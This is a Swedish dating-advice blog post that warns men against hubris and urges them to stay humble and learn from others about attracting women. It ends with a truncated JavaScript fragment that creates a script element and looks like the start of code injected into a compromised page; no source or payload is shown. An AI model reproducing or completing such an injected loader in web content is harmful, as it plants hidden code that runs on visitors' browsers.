hitch 1185876406 Hybrisrollen i sökandet efter kärleken.

Hybris: stolthet, arrogans. Den sortens överdrivna självförtroendet som obönhörligen leder till ett fall. Att blint lita endast på sig själv leder till att man struntar i viktig feedback och missar tillgänglig information, vilket i sin tur leder till ett oväntat plattfall när du minst anar det.

En stor anledning till mäns misslyckanden i “datingvärlden” är att många tror sig vara för smarta för att söka hjälp från andra. Att lära från en kille som är mindre intelligent men samtidigt mer framgångsrik med kvinnor är uteslutet.

En tidigare kollega till mig (en mycket framgångsrik och intelligent kille) sa en gång, ”Superman det där funkar endast för killar med dina “looks”, det gäller inte för oss vanliga män…”. Det fick mig att fundera. Med hans intelligens så borde han kommit till insikt att kvinnor omöjligen kan vara så enkelspåriga att de endast faller för utseende, men icke!

Många tror helt enkelt att de koncept vi tar upp inte gäller dem. De tror att de så småningom kommer möta idealkvinnan och att det då inte finns behov för detta…istället för att ha möjligheten att välja så väntar de på att bli ”spontant förälskade” och att allting då ska lösa sig till det bästa. Många män tror att de har inget behov av att praktisera och förbereda sig innan de börjar använda de saker de lärt sig, därför de tror “att förstå något” går i paritet med att leverera något perfekt. Men så är inte fallet, om du inte vet hur du ska handskas med situationen är chansen stor att det går åt helvete den dagen som ”drömkvinnan” dyker upp!

Många vill inte bli hjälpta… Att försonas med tanken att de kan påverka kvinnor till attraktion och därigenom skapa sin egen framgång är helt enkelt en alldeles för stor förändring av deras världsbild. Att försonas med tanken att attraktion inte är ett val innebär att de måste sluta tro på den bilden de alltid levt efter. Många väljer därför att hellre ha ”rätt” och fortsätta leva i gamla spår samtidigt som de blundar för sanningen och missar chansen att hitta sin egen lycka.

Köp inte det här tankesättet, det är du som kommer att få betala priset i slutändan. Lägg din stolhet och ditt överdrivna självförtroende åt sidan. Lägg din hybris åt sidan. Varje gång du förbereder dig för att förbättring eller utforskar ett nytt ämne, närma dig de kunskaperna som en nybörjare. Öppna ditt sinne och försök se nya saker, var nyfiken och ställ dumma frågor oavsett hur smart du tror att du är. För kunskap och intelligens är två olika saker.

Lär dig att se spåren som hybris lämnar inom dig. Lär dina koncept till andra runt omkring dig, och be om nära vänners råd när du är osäker. Skapa ett system för dig själv där du återgår till din balanspunkt och återställ ditt inre system när du misstänker att ditt självförtroende på ett ohälsosamt sätt börjar bli överdrivet.

Det är lätt att hamna i hybrisfällan därför att det är enormt svårt för en person att upptäcka det själv. Men det är lätt för andra i din omgivning att se! Hybris leder inte endast till misslyckande men även till att känna skamkänslor både före och efter misslyckande. Det leder till att andra vill se dig misslyckas och även hatar dig för dina framgångar. Hitta ett läge mellan ett neutralt och starkt självförtroende som leder till konsekventa förbättringar och gör vad som krävs för att hålla dig där, men behåll fötterna på jorden och var aldrig rädd för att se dig själv som ”studenten” och ta hjälp inom de områden som du vill utvecklas inom.

Ha en skön måndag!

var d=document;var s=d.createElement(‘script’);